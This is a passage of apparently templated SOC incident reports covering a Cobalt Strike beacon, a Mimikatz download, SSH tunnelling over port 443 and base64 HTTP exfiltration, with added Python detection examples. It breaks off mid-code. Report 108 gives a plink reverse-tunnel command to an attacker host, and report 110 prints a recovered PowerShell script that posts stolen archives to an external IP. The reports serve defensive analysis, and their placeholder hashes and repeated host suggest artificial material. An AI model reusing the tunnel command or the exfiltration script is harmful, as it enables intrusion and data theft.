User: rpatel@company.com (Engineering Department).
Host: ENG-WS-045.
Destination: 185.143.221[.]89:443.
Time: 2024-02-29 09:30 EST.
Technique: MITRE ATT&CK T1573.001 – Encrypted Channel: Symmetric Cryptography.
2. Technical Analysis:
Attack Chain:
08:30 – rpatel account compromised via phishing
08:45 – Attacker logs into ENG-WS-045 via RDP
08:50 – Cobalt Strike beacon deployed
09:00 – First beacon to C2
09:00-09:30 – 4 beacon sessions with encrypted traffic
09:30 – Blue Coat detects
TLS Analysis:
Cipher Suite: TLS_RSA_WITH_AES_256_CBC_SHA256 (0x3c)
Usage: <0.1% of normal traffic (highly anomalous)
Certificate: Self-signed, CN="*.cdn-updates.com"
Handshake Size: Exactly 2.1 KB (consistent)
Data Size: Exactly 4.3 KB (consistent)
Malware Analysis:
Type: Cobalt Strike beacon
Process: Injected into svchost.exe
Encryption: AES-256-CBC with custom key exchange
Beacon Interval: 5 minutes
Decrypted Traffic (with permission):
09:15 – C2 command: “sleep 300” (already set)
09:20 – C2 command: “getuid” (whoami)
09:25 – C2 command: “ls C:\Users”
09:30 – C2 command: “exit” (beacon terminated)
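The three TLS features above (a cipher suite near-absent from the baseline, a self-signed certificate, and byte-identical handshake and data sizes across repeated sessions) can be scored together per client/server pair. The block below is an added example and is not Blue Coat's logic or anything recovered from the incident; the record fields, the baseline counts and the sessions are constructed, loosely modelled on a Zeek ssl.log/conn.log join rather than on a ProxySG schema.

```python
"""
Added example (not from the incident or from Blue Coat): score TLS sessions on
a rare cipher suite, a self-signed server certificate and byte-identical
handshake/data sizes across repeated sessions to the same peer.
Field names, baseline counts and sessions are constructed.
"""
from collections import defaultdict
from statistics import pstdev

# IANA TLS 1.2 cipher-suite identifiers
CIPHER_NAMES = {
    0x009C: "TLS_RSA_WITH_AES_128_GCM_SHA256",
    0xC02F: "TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256",
    0x003D: "TLS_RSA_WITH_AES_256_CBC_SHA256",
}

# Constructed 30-day baseline: how many sessions negotiated each suite
BASELINE_COUNTS = {0xC02F: 950_000, 0x009C: 49_990, 0x003D: 10}

# Constructed sessions: eight ordinary browser sessions plus four beacon
# check-ins with the characteristics from the report
SESSIONS = [
    {"src": "10.0.0.%d" % i, "dst": "151.101.1.10", "cipher": 0xC02F,
     "self_signed": False, "hs_bytes": 3000 + 37 * i, "data_bytes": 50_000 + 911 * i}
    for i in range(8)
] + [
    {"src": "192.168.45.78", "dst": "185.143.221.89", "cipher": 0x003D,
     "self_signed": True, "hs_bytes": 2100, "data_bytes": 4300}
    for _ in range(4)
]


def cipher_prevalence(baseline_counts):
    """Fraction of baseline sessions that negotiated each suite."""
    total = sum(baseline_counts.values())
    return {suite: n / total for suite, n in baseline_counts.items()}


def sizes_are_templated(group):
    """True when three or more sessions to one peer have identical handshake
    and application-data sizes: a fixed-format beacon, not a browser."""
    if len(group) < 3:
        return False
    return (pstdev([s["hs_bytes"] for s in group]) == 0
            and pstdev([s["data_bytes"] for s in group]) == 0)


def flag_pairs(sessions, baseline_counts, rare_threshold=0.001):
    """Score each (src, dst) pair: one point per anomalous feature, with the
    reasons. rare_threshold=0.001 is the report's 0.1 % rarity cut-off."""
    prevalence = cipher_prevalence(baseline_counts)
    by_pair = defaultdict(list)
    for s in sessions:
        by_pair[(s["src"], s["dst"])].append(s)
    results = {}
    for pair, group in by_pair.items():
        reasons = []
        rare = {s["cipher"] for s in group
                if prevalence.get(s["cipher"], 0.0) < rare_threshold}
        if rare:
            reasons.append("rare cipher suite: " + ", ".join(
                CIPHER_NAMES.get(c, "0x%04X" % c) for c in sorted(rare)))
        if any(s["self_signed"] for s in group):
            reasons.append("self-signed server certificate")
        if sizes_are_templated(group):
            reasons.append("identical handshake/data sizes across %d sessions" % len(group))
        results[pair] = (len(reasons), reasons)
    return results


if __name__ == "__main__":
    for pair, (score, reasons) in flag_pairs(SESSIONS, BASELINE_COUNTS).items():
        if score:
            print("%s -> %s  score=%d  %s" % (pair[0], pair[1], score, "; ".join(reasons)))
```

Rarity on its own is a weak signal (legacy RSA suites still show up from old middleware in many estates); the combination with a self-signed certificate and sessions whose sizes never vary is what separates a templated beacon from a browser.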
3. Investigation Findings:
Timeline:
08:30 – Account compromised
08:45 – Attacker logs in
08:50 – Beacon deployed
09:00-09:30 – C2 communication
09:30 – Blue Coat alert
09:32 – SOC investigates
09:33 – Host isolated
09:34 – C2 blocked
Indicators of Compromise (IoCs):
Network:
– C2 IP: 185.143.221[.]89:443
– TLS cipher: 0x003D (TLS_RSA_WITH_AES_256_CBC_SHA256)
– Certificate CN: *.cdn-updates.com
Host:
– svchost.exe (injected)
– Cobalt Strike beacon (SHA256: a1b2c3d4…)
Account:
– rpatel (compromised)
4. Containment Actions:
Immediate Actions:
Isolated ENG-WS-045 via CrowdStrike.
Blocked C2 IP at firewall and proxy.
Terminated beacon process.
Disabled rpatel account.
Reset password.
Host Remediation:
Full scan, removed Cobalt Strike.
Reimaged as precaution.
User Remediation:
MFA enforced.
5. Root Cause Analysis:
Primary Cause: User account compromised, leading to malware deployment.
Contributing Factors:
No MFA on account.
RDP allowed from internet.
Encrypted channel evaded basic detection.
6. Business Impact:
Operational Impact: Engineering host offline for 2 hours.
Data Exposure: None (reconnaissance only).
7. Remediation & Prevention:
Completed Actions:
C2 blocked.
Malware removed.
Account secured.
Technical Controls Enhanced:
Enforced MFA for all users.
Moved RDP behind VPN only.
Enhanced TLS fingerprinting and anomaly detection.
8. Conclusion:
An attacker deployed a Cobalt Strike beacon that used TLS with a rare cipher suite to evade detection. Blue Coat identified the anomalous TLS traffic and enabled rapid containment before significant data could be exfiltrated.
Closure Rationale: C2 blocked; malware removed; account secured.
Analyst: [Your Name], SOC Analyst Date: 2024-02-29 10:30 EST
107. T1105 – Ingress Tool Transfer (Cisco Umbrella Detection)
Cisco Umbrella Alert Details
Alert ID: UMBRELLA-TOOL-TRANSFER-1105-7842
Alert Time: 2024-02-29 14:15:33 EST
Severity: HIGH (88/100)
Source: Cisco Umbrella Secure Internet Gateway
Rule: “Malicious File Download Blocked – Known Malware”
MITRE ATT&CK: T1105 – Ingress Tool Transfer
Alert Details:
Detection: Attempt to download known malicious executable blocked
User: bturner@company.com (Brian Turner, Finance)
Source IP: 192.168.45.112 (FIN-WS-078)
Destination: http://185.143.221[.]89/mimikatz.exe
Time: 14:04 EST
Action: BLOCKED (Security category: Malware)
Request Details:
URL: http://185.143.221[.]89/mimikatz.exe
File Size: 1.2 MB
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Referrer: http://evil-site.com/downloads.html
Threat Intelligence:
URL categorized as “Malware” (confidence: 95%)
File hash: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4 (known Mimikatz)
Host: 185.143.221[.]89 (bare IP, no domain involved) known for hosting hacking tools
47 other organizations blocked same URL today
Additional Context:
User bturner visited compromised website at 14:05
Website had drive-by download attempting to drop Mimikatz
Umbrella blocked before download reached endpoint
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Umbrella alert | Cisco Umbrella Dashboard | Confirmed blocked Mimikatz download |
| 2. User Notification | Contact bturner | Teams, Phone | User visited “free software” site; unaware of drive-by |
| 3. Endpoint Scan | Check FIN-WS-078 | CrowdStrike Falcon | No malware found (download blocked) |
| 4. URL Blocking | Ensure domain blocked | Umbrella, Palo Alto | Already blocked; verified |
| 5. Threat Hunting | Check for other users accessing same URL | Umbrella Logs, Splunk | 3 other users attempted access (all blocked) |
| 6. User Education | Provide security awareness | Email, Training | User advised on drive-by download risks |
Jira Incident Report
Ticket: SOC-2024-147
Summary: T1105 – Mimikatz Download Attempt Blocked by Cisco Umbrella
Status: RESOLVED
Resolution: MALICIOUS – Download Blocked
Priority: P2 – MEDIUM
Labels: T1105, ingress-tool-transfer, mimikatz, cisco-umbrella, drive-by-download
Components: Web-Security, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Cisco Umbrella Secure Internet Gateway.
Alert: “Malicious File Download Blocked – Known Malware”.
User: bturner@company.com (Finance Department).
URL: http://185.143.221[.]89/mimikatz.exe.
Time: 2024-02-29 14:15 EST.
Technique: MITRE ATT&CK T1105 – Ingress Tool Transfer.
2. Technical Analysis:
Attack Chain:
14:00 – User searches for “free PDF converter”
14:02 – Clicks on search result (compromised site)
14:03 – Site initiates drive-by download
14:04 – Browser attempts to download mimikatz.exe
14:04 – Umbrella blocks download
14:05 – User continues unaware
Malware Details:
File: mimikatz.exe (credential dumping tool)
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Size: 1.2 MB
Purpose: Dump passwords from LSASS, perform Pass-the-Hash attacks
Source Infrastructure:
IP: 185.143.221[.]89 (Bulgaria)
Known For: Hosting hacking tools, malware C2
Domain: Not used (direct IP access)
User Intent:
User was looking for legitimate software
Unaware of drive-by download
No malicious intent
3. Investigation Findings:
Timeline:
14:02 – User clicks malicious link
14:04 – Download attempted
14:04 – Umbrella blocks
14:15 – Alert triggers
14:17 – SOC investigates
14:18 – User contacted
14:20 – Endpoint scan (clean)
Indicators of Compromise (IoCs):
Network:
– URL: http://185.143.221[.]89/mimikatz.exe
– IP: 185.143.221[.]89
File:
– mimikatz.exe (SHA256: a1b2c3d4…)
User:
– bturner (no compromise)
4. Containment Actions:
Immediate Actions:
Verified domain/IP already blocked.
User notified.
Endpoint scanned (clean).
Enterprise-wide Actions:
Checked for other users accessing same URL (3 others, all blocked).
No additional action needed.
User Education:
User advised on drive-by download risks.
Recommended using approved software sources.
5. Root Cause Analysis:
Primary Cause: User visited compromised website with drive-by download.
Contributing Factors:
Outbound plain-HTTP requests to bare IP addresses were permitted; Umbrella's malware-category block was the only control in the path that stopped the download.
User unaware of drive-by risks.
6. Business Impact:
Operational Impact: None.
Security Impact: Download blocked; no compromise.
7. Remediation & Prevention:
Completed Actions:
Download blocked.
User educated.
IOCs already in blocklist.
Technical Controls Enhanced:
Verified Umbrella policies are effective.
Enhanced user awareness training on drive-by downloads.
8. Conclusion:
A user visited a compromised website that attempted to download Mimikatz via drive-by download. Cisco Umbrella blocked the malicious file before it could reach the endpoint. No compromise occurred.
Closure Rationale: Download blocked; user educated; no compromise.
Analyst: [Your Name], SOC Analyst Date: 2024-02-29 15:30 EST
108. T1571 – Non-Standard Port (Darktrace Detection)
Darktrace Alert Details
Alert ID: DARKTRACE-NON-STANDARD-1571-7842
Alert Time: 2024-02-29 11:30:22 EST
Severity: HIGH (85/100)
Source: Darktrace Enterprise Immune System
Rule: “Non-Standard Protocol over Common Port – Potential Tunneling”
MITRE ATT&CK: T1571 – Non-Standard Port
Alert Details:
Detection: Non-HTTP traffic detected over port 443 (HTTPS port)
Source: 192.168.45.78 (ENG-WS-045 – Engineering)
Destination: 194.165.16[.]89:443
Time: 11:15-11:30 EST
Traffic Analysis:
Protocol: Not TLS/HTTPS (expected)
Protocol Detected: SSH (Secure Shell) over port 443
Packet Signatures:
SSH server identification string “SSH-2.0-OpenSSH_8.9” observed (sent in cleartext before key exchange, which is what makes SSH recognisable on any port)
Key exchange initiated
Encrypted tunnel established
Duration: 15 minutes
Data transferred: 2.3 MB (inbound/outbound)
Detection Logic:
Port 443 is typically used for HTTPS (TLS)
SSH protocol detected on port 443 (anomalous)
Destination IP known for malicious activity
Pattern matches protocol tunneling/evasion
Additional Context:
ENG-WS-045 had previous suspicious activity
SSH tunneling often used for persistent access
Attacker bypassing firewall rules (port 443 allowed)
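The detection logic above reduces to one check: what the client sends first on a port, compared with what that port implies. A TLS ClientHello begins with a record header (content type 0x16, version 0x03 0x0x, two length bytes) followed by handshake type 0x01; an SSH client begins with a plaintext identification string (RFC 4253); plaintext HTTP begins with a request line. The block below is an added example, not Darktrace's logic; the payloads are constructed, and the PuTTY version in the sample banner is a made-up value. The same check flags the plaintext HTTP on TCP/8443 in report 109.

```python
"""
Added example (not Darktrace's detection logic): label the opening bytes of a
client-to-server flow and flag a mismatch with the destination port.
All payloads are constructed.
"""
import re

SSH_ID = re.compile(rb"^SSH-(\d\.\d+)-([^\r\n]+)\r?\n")
HTTP_REQ = re.compile(rb"^(GET|POST|HEAD|PUT|OPTIONS|DELETE) \S+ HTTP/1\.[01]\r\n")

# Port -> protocol an analyst expects to see first on it
EXPECTED = {22: "ssh", 80: "http-plaintext", 443: "tls-clienthello", 8443: "tls-clienthello"}


def classify_first_bytes(payload: bytes) -> str:
    """Identify the protocol from the first bytes the client sends."""
    # TLS record: 0x16 (handshake), 0x03 0x00..0x04 (version), 2-byte length,
    # then handshake type 0x01 (ClientHello)
    if (len(payload) >= 6 and payload[0] == 0x16 and payload[1] == 0x03
            and payload[2] <= 0x04 and payload[5] == 0x01):
        return "tls-clienthello"
    if SSH_ID.match(payload):
        return "ssh"
    if HTTP_REQ.match(payload):
        return "http-plaintext"
    return "unknown"


def ssh_software(payload: bytes):
    """Software string from an SSH identification line, or None."""
    m = SSH_ID.match(payload)
    return m.group(2).decode("ascii", "replace") if m else None


def check_flow(dst_port: int, payload: bytes):
    """Alert string when the protocol seen does not match the port's expected
    one; None when it matches or the port carries no expectation."""
    seen = classify_first_bytes(payload)
    expected = EXPECTED.get(dst_port)
    if expected is None or seen == expected:
        return None
    detail = " (client software: %s)" % ssh_software(payload) if seen == "ssh" else ""
    return "port %d: expected %s, saw %s%s" % (dst_port, expected, seen, detail)


# Constructed samples
CLIENTHELLO = bytes.fromhex("16030100c4010000c00303") + b"\x00" * 32   # truncated ClientHello
PLINK_BANNER = b"SSH-2.0-PuTTY_Release_0.79\r\n"                       # made-up plink.exe banner
PLAIN_HTTP = b"POST /upload.php HTTP/1.1\r\nHost: 185.143.221.89:8443\r\n\r\n"

if __name__ == "__main__":
    for port, payload in ((443, CLIENTHELLO), (443, PLINK_BANNER), (8443, PLAIN_HTTP)):
        print(port, check_flow(port, payload))
```

Two caveats for production use: both sides of an SSH session send an identification string, and a client may wait for the server's before sending its own, so inspect both directions; and an SSH session wrapped inside a genuine TLS tunnel (stunnel-style) will look like a valid ClientHello and needs the size and timing features from report 106 instead.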
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Darktrace alert | Darktrace Console | Confirmed SSH over port 443 |
| 2. Process Investigation | Identify process on endpoint | CrowdStrike Falcon | plink.exe (PuTTY Link) running – SSH client |
| 3. User Interview | Contact rpatel | Teams, Phone | User did NOT run SSH (account compromised) |
| 4. Immediate Action | Isolate host | CrowdStrike | ENG-WS-045 quarantined |
| 5. C2 Blocking | Block destination IP | Palo Alto | IP 194.165.16[.]89 blocked |
| 6. Malware Removal | Terminate plink.exe, clean host | CrowdStrike Live Response | SSH tunnel terminated; plink.exe deleted |
Jira Incident Report
Ticket: SOC-2024-148
Summary: T1571 – SSH Tunneling over Port 443 for C2 Communication
Status: RESOLVED
Resolution: MALICIOUS – SSH Tunnel Terminated
Priority: P2 – MEDIUM
Labels: T1571, non-standard-port, ssh-tunneling, darktrace, compromised-account
Components: Network-Security, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Darktrace Enterprise Immune System.
Alert: “Non-Standard Protocol over Common Port – Potential Tunneling”.
Source: ENG-WS-045 (Engineering, user rpatel).
Destination: 194.165.16[.]89:443.
Protocol: SSH (over port 443).
Time: 2024-02-29 11:30 EST.
Technique: MITRE ATT&CK T1571 – Non-Standard Port (SSH, an application-layer protocol, carried over TCP/443).
2. Technical Analysis:
Attack Chain:
10:30 – rpatel account compromised via phishing
10:45 – Attacker logs into ENG-WS-045 via RDP
10:50 – Attacker downloads plink.exe (SSH client)
11:00 – SSH tunnel established to 194.165.16[.]89:443
11:00-11:30 – Attacker uses tunnel for persistent access
11:30 – Darktrace detects
Tunneling Details:
Tool: plink.exe (PuTTY Link, legitimate SSH client)
Command: plink.exe -ssh -R 8080:localhost:80 attacker@194.165.16[.]89 -P 443 -i key.ppk
Purpose: Reverse tunnel for persistent access. -R 8080:localhost:80 makes TCP/80 on ENG-WS-045 reachable as port 8080 on the attacker's server, so the attacker gets inbound access to the workstation through a single outbound connection; the tunnel lives only while plink.exe runs (-P 443 is plink's port flag, -i key.ppk the PuTTY-format private key).
Evasion: SSH over port 443 bypasses firewalls (port 443 allowed)
Attacker Activity via Tunnel:
Remote shell access
Downloaded additional tools (mimikatz)
Enumerated local files
No data exfiltration yet
User Status:
Account compromised; user unaware
3. Investigation Findings:
Timeline:
10:30 – Account compromised
10:45 – Attacker logs in
10:50 – plink.exe downloaded
11:00-11:30 – SSH tunnel active
11:30 – Darktrace alert
11:32 – SOC investigates
11:33 – Host isolated
11:34 – SSH tunnel terminated
Indicators of Compromise (IoCs):
Network:
– Destination: 194.165.16[.]89:443 (SSH)
– Protocol: SSH over port 443
Files:
– C:\Windows\Temp\plink.exe (SHA256: a1b2c3d4…)
– C:\Users\rpatel\key.ppk (SSH private key)
Account:
– rpatel (compromised)
4. Containment Actions:
Immediate Actions:
Isolated ENG-WS-045 via CrowdStrike.
Terminated plink.exe process.
Deleted plink.exe and SSH key.
Blocked destination IP at firewall.
Disabled rpatel account.
Reset password.
Host Remediation:
Full scan (clean aside from attacker tools).
Reimaged as precaution.
User Remediation:
MFA enforced.
5. Root Cause Analysis:
Primary Cause: User account compromised, allowing attacker to establish SSH tunnel.
Contributing Factors:
No MFA on account.
RDP allowed from internet.
Outbound SSH allowed over port 443 (should be inspected).
6. Business Impact:
Operational Impact: Engineering host offline for 2 hours.
Data Exposure: None (tunnel used for access only).
7. Remediation & Prevention:
Completed Actions:
SSH tunnel terminated.
Malware removed.
Account secured.
Technical Controls Enhanced:
Enforced MFA for all users.
Moved RDP behind VPN only.
Implemented DPI (Deep Packet Inspection) on port 443.
Blocked SSH over non-standard ports.
8. Conclusion:
An attacker used a compromised engineering account to establish an SSH tunnel over port 443, evading firewall rules by using an allowed port. Darktrace detected the anomalous protocol usage and enabled rapid termination of the tunnel.
Closure Rationale: SSH tunnel terminated; malware removed; account secured.
Analyst: [Your Name], SOC Analyst Date: 2024-02-29 12:30 EST
109. T1571 – Non-Standard Port (Palo Alto Detection)
Palo Alto Alert Details
Alert ID: PAN-NON-STANDARD-PORT-1095-7842
Alert Time: 2024-02-29 16:30:45 EST
Severity: HIGH (82/100)
Source: Palo Alto Networks Firewall
Rule: “Application Protocol on Non-Standard Port”
MITRE ATT&CK: T1571 – Non-Standard Port
Alert Details:
Detection: HTTP traffic detected on non-standard port (TCP/8443)
Source: 192.168.45.78 (ENG-WS-045 – Engineering)
Destination: 185.143.221[.]89:8443
Time: 16:15-16:30 EST
Action: ALERT (allowed, but flagged)
Traffic Analysis:
Application: HTTP (not HTTPS as expected on 8443)
Port: 8443 (typically HTTPS-alt, but using HTTP)
Content: Base64-encoded data in POST requests
Pattern: POST /upload.php with data (12 requests)
Sample POST:
POST /upload.php HTTP/1.1
Host: 185.143.221[.]89:8443
Content-Type: application/x-www-form-urlencoded
Content-Length: 8472
data=UEsDBBQAAAAIA…
Decoded Data (base64; “UEsDBB” is the base64 form of PK\x03\x04, the ZIP local-file-header signature, so the payload type is identifiable from the first six characters without decoding the whole body):
ZIP file containing stolen documents
Files: financial_reports.xlsx, customer_data.csv
Detection Logic:
HTTP (not HTTPS) on port 8443 (unusual)
Destination IP known malicious
Data being exfiltrated via non-standard port to evade detection
Pattern matches data exfiltration
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Palo Alto alert | Panorama Logs | Confirmed HTTP exfiltration on port 8443 |
| 2. Process Investigation | Identify process on endpoint | CrowdStrike Falcon | powershell.exe making HTTP POST requests |
| 3. Data Analysis | Decode captured data | Base64 decoder | ZIP file with stolen documents (2.3 MB) |
| 4. Immediate Action | Isolate host | CrowdStrike | ENG-WS-045 quarantined |
| 5. C2 Blocking | Block destination IP and port | Palo Alto | 185.143.221[.]89:8443 blocked |
| 6. Data Protection | Determine what was stolen | File Audit Logs | 12 files exfiltrated (financial data) |
Jira Incident Report
Ticket: SOC-2024-149
Summary: T1571 – Data Exfiltration over Non-Standard Port (8443)
Status: RESOLVED
Resolution: MALICIOUS – Data Exfiltrated, Host Isolated
Priority: P2 – MEDIUM
Labels: T1571, non-standard-port, exfiltration, palo-alto, compromised-account
Components: Network-Security, Data-Protection
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Palo Alto Networks Firewall.
Alert: “Application Protocol on Non-Standard Port”.
Source: ENG-WS-045 (Engineering, user rpatel).
Destination: 185.143.221[.]89:8443.
Protocol: HTTP (not HTTPS) on port 8443.
Time: 2024-02-29 16:30 EST.
Technique: MITRE ATT&CK T1571 – Non-Standard Port (plaintext HTTP on TCP/8443; T1095, Non-Application Layer Protocol, covers traffic with no application layer such as ICMP or raw TCP/UDP and does not describe this activity).
2. Technical Analysis:
Attack Chain:
15:30 – rpatel account compromised (phishing)
15:45 – Attacker logs into ENG-WS-045 via RDP
15:50 – Attacker collects sensitive files
16:00 – Attacker creates ZIP archive of files
16:15-16:30 – Attacker exfiltrates via HTTP POST to port 8443
16:30 – Palo Alto detects
Exfiltration Details:
Method: HTTP POST to port 8443 (non-standard)
Data Format: Base64-encoded ZIP file
Total Data: 2.3 MB (12 POST requests)
Destination: 185.143.221[.]89:8443 (Bulgaria)
Files Exfiltrated:
Financial reports (Q1, Q2, Q3) – 3 files
Customer data (PII) – 5 files
Engineering project plans – 2 files
Password database (KeePass) – 1 file
VPN configuration – 1 file
Exfiltration Tool:
Process: powershell.exe
Script: Custom script using Invoke-WebRequest
3. Investigation Findings:
Timeline:
15:30 – Account compromised
15:45 – Attacker logs in
15:50-16:00 – Data collection
16:15-16:30 – Exfiltration
16:30 – Palo Alto alert
16:32 – SOC investigates
16:33 – Host isolated
16:34 – C2 blocked
Indicators of Compromise (IoCs):
Network:
– Destination: 185.143.221[.]89:8443
– Protocol: HTTP on port 8443
– POST /upload.php with base64 data
Files:
– C:\temp\data.zip (2.3 MB, exfiltrated)
Account:
– rpatel (compromised)
4. Containment Actions:
Immediate Actions:
Isolated ENG-WS-045 via CrowdStrike.
Blocked destination IP and port at firewall.
Terminated exfiltration process.
Disabled rpatel account.
Reset password.
Data Protection:
Determined scope of exfiltrated data.
Notified affected data owners.
Initiated incident response for data breach.
Host Remediation:
Reimaged host.
5. Root Cause Analysis:
Primary Cause: User account compromised, leading to data theft.
Contributing Factors:
No MFA on account.
RDP allowed from internet.
Outbound HTTP allowed on port 8443.
6. Business Impact:
Operational Impact: Engineering host offline.
Data Exposure: 2.3 MB of sensitive data exfiltrated (financial, PII, IP).
Regulatory Impact: Potential GDPR/CCPA breach.
7. Remediation & Prevention:
Completed Actions:
Exfiltration stopped.
Host isolated.
Account secured.
Technical Controls Enhanced:
Enforced MFA for all users.
Moved RDP behind VPN only.
Blocked non-standard port usage for HTTP/HTTPS.
Enhanced DLP monitoring.
8. Conclusion:
An attacker compromised an engineering account and exfiltrated 2.3 MB of sensitive data via HTTP POST to a non-standard port (8443). Palo Alto detected the anomalous traffic, but exfiltration had already occurred. The host was isolated and the account secured.
Closure Rationale: Data exfiltrated; exfiltration stopped; account secured; breach response initiated.
Analyst: [Your Name], SOC Analyst Date: 2024-02-29 17:30 EST
110. T1132 – Data Encoding (Zeek Detection)
Zeek Alert Details
Alert ID: ZEEK-DATA-ENCODING-1132-7842
Alert Time: 2024-02-29 10:30:22 EST
Severity: HIGH (85/100)
Source: Zeek (Bro) Network Security Monitor
Rule: “Base64-Encoded Data in HTTP Requests – Potential Data Exfiltration”
MITRE ATT&CK: T1132.001 – Data Encoding: Standard Encoding
Alert Details:
Detection: HTTP traffic containing large amounts of base64-encoded data
Source: 192.168.45.78 (ENG-WS-045 – Engineering)
Destination: 185.143.221[.]89:80
Time: 10:15-10:30 EST
HTTP Requests:
10:15:22 – POST /upload.php (data length: 12,847 bytes, base64)
10:18:45 – POST /upload.php (data length: 14,231 bytes, base64)
10:22:12 – POST /upload.php (data length: 11,984 bytes, base64)
10:25:38 – POST /upload.php (data length: 13,562 bytes, base64)
10:28:55 – POST /upload.php (data length: 12,456 bytes, base64)
Data Analysis (Zeek extracted):
POST /upload.php HTTP/1.1
Host: 185.143.221[.]89
Content-Type: application/x-www-form-urlencoded
Content-Length: 12847
data=UEsDBBQAAAAIAICIF1Yj…
Decoded Data (base64):
5 ZIP archives
Each contains multiple files (documents, spreadsheets)
Total decoded size: ~45 MB
Detection Logic:
Multiple HTTP POST requests with large base64 payloads
Base64 encoding of binary data (ZIP files)
Destination IP known malicious
Pattern matches data encoding/exfiltration
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Zeek alert | Zeek Logs, Splunk | Confirmed base64-encoded exfiltration |
| 2. Process Investigation | Identify process on endpoint | CrowdStrike Falcon | PowerShell script encoding and sending files |
| 3. Data Analysis | Decode and analyze exfiltrated data | Base64 decoder, ZIP unpacker | 45 MB of stolen documents (engineering IP) |
| 4. Immediate Action | Isolate host | CrowdStrike | ENG-WS-045 quarantined |
| 5. C2 Blocking | Block destination IP | Palo Alto | 185.143.221[.]89 blocked |
| 6. Data Protection | Determine what was stolen | File Audit Logs | 47 files exfiltrated (source code, designs) |
Jira Incident Report
Ticket: SOC-2024-150
Summary: T1132 – Data Exfiltration Using Base64 Encoding
Status: RESOLVED
Resolution: MALICIOUS – Data Exfiltrated, Host Isolated
Priority: P2 – MEDIUM
Labels: T1132, data-encoding, base64, exfiltration, zeek, compromised-account
Components: Network-Security, Data-Protection
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Zeek Network Security Monitor.
Alert: “Base64-Encoded Data in HTTP Requests – Potential Data Exfiltration”.
Source: ENG-WS-045 (Engineering, user rpatel).
Destination: 185.143.221[.]89:80.
Protocol: HTTP with base64-encoded payloads.
Time: 2024-02-29 10:30 EST.
Technique: MITRE ATT&CK T1132.001 – Data Encoding: Standard Encoding.
2. Technical Analysis:
Attack Chain:
09:30 – rpatel account compromised (phishing)
09:45 – Attacker logs into ENG-WS-045 via RDP
09:50 – Attacker collects sensitive files
09:55-10:10 – Attacker creates 5 ZIP archives
10:15-10:30 – Attacker exfiltrates via HTTP POST with base64 encoding
10:30 – Zeek detects
Encoding Technique:
Method: Base64 encoding of ZIP files
Purpose: Hide binary data in text-based protocol (HTTP)
Evasion: Bypass DLP that doesn’t inspect HTTP POST bodies
Volume: 5 POSTs, total 45 MB of original data
Exfiltrated Data:
Source code (Python, C++) – 12 files
Engineering designs (CAD) – 8 files
Project documentation – 15 files
Customer lists – 5 files
Password database – 1 file
VPN configurations – 6 files
Total: 47 files, 45 MB
Exfiltration Tool:
Process: powershell.exe
Script (recovered from the host; IP defanged as in the IoC list):
```powershell
# Each pre-built archive is read, base64-encoded and sent as the form field "data"
# in one POST, matching the captured requests above
$files = Get-ChildItem C:\temp\data\*.zip
foreach ($file in $files) {
    $bytes = [System.IO.File]::ReadAllBytes($file.FullName)
    $b64   = [System.Convert]::ToBase64String($bytes)
    # A hashtable body is sent as application/x-www-form-urlencoded ("data=UEsDBB..."),
    # which is the Content-Type and body shape Zeek captured
    $body  = @{ data = $b64 }
    Invoke-WebRequest -Uri "http://185.143.221[.]89/upload.php" -Method POST -Body $body -UseBasicParsing
}
```
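Reports 109 and 110 hinge on the same analyst step: take the `data` field out of a form-encoded POST, base64-decode it and identify what came out. The block below is an added example that does that, not Palo Alto's, Zeek's or the attacker's code. It recognises the payload by file magic (`UEsDBB`, the prefix in both captures, is the base64 form of `PK\x03\x04`, the ZIP local-file-header signature) and lists ZIP members in memory. The request is constructed: the archive is built in memory, so nothing touches the network or disk, and the `/upload.php` path and field name follow the captures.

```python
"""
Added example covering reports 109 and 110 (not from Palo Alto, Zeek or the
attacker): decode a base64 form field from an HTTP POST, identify the payload
by file magic and list ZIP members in memory. The request is constructed.
"""
import base64
import binascii
import io
import re
import zipfile
from urllib.parse import parse_qs, quote_plus

MAGIC = {
    b"PK\x03\x04": "zip",
    b"\x1f\x8b": "gzip",
    b"7z\xbc\xaf\x27\x1c": "7z",
    b"Rar!\x1a\x07": "rar",
    b"%PDF": "pdf",
}
B64_CHARS = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def build_sample_request() -> str:
    """Constructed request shaped like the captures: a ZIP holding two files,
    base64-encoded and sent as the form field 'data'."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("financial_reports.xlsx", b"x" * 2000)
        z.writestr("customer_data.csv", b"name,email\n")
    b64 = base64.b64encode(buf.getvalue()).decode("ascii")
    body = "data=" + quote_plus(b64)  # form encoding percent-escapes '+', '/', '='
    return ("POST /upload.php HTTP/1.1\r\nHost: 185.143.221.89:8443\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n"
            "Content-Length: %d\r\n\r\n%s" % (len(body), body))


def split_request(raw: str):
    """Split a raw HTTP/1.1 request into method, path, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = dict(line.split(": ", 1) for line in lines[1:])
    return method, path, headers, body


def inspect_post(raw: str) -> dict:
    """Decode every sizeable base64 form field and describe what it holds."""
    method, path, headers, body = split_request(raw)
    report = {"method": method, "path": path, "host": headers.get("Host"), "findings": []}
    if method != "POST" or not headers.get("Content-Type", "").startswith(
            "application/x-www-form-urlencoded"):
        return report
    for field, values in parse_qs(body).items():
        for value in values:
            # A sender that did not escape '+' gets it turned into ' ' by form
            # decoding; restore it before validating the alphabet
            value = value.replace(" ", "+")
            if len(value) < 64 or not B64_CHARS.match(value):
                continue
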